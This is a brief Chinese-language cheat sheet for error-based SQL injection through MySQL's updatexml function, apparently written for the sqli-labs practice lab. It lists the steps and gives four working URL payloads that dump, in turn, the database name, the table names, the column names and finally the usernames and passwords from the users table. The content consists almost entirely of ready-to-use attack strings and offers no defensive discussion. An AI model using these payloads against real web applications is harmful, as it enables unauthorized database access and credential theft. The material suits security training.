updatexml函数
基于报错的注入一般bu'z步骤
1.求闭合字符;2.爆数据库名;3.爆表名;4.爆列名;5.爆字段名。
求库名
?id=1’ and updatexml(1,concat(0x23,database()),1)%23
求表名
?id=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
求列名
?id=1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) %23
求字段内容
?id=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23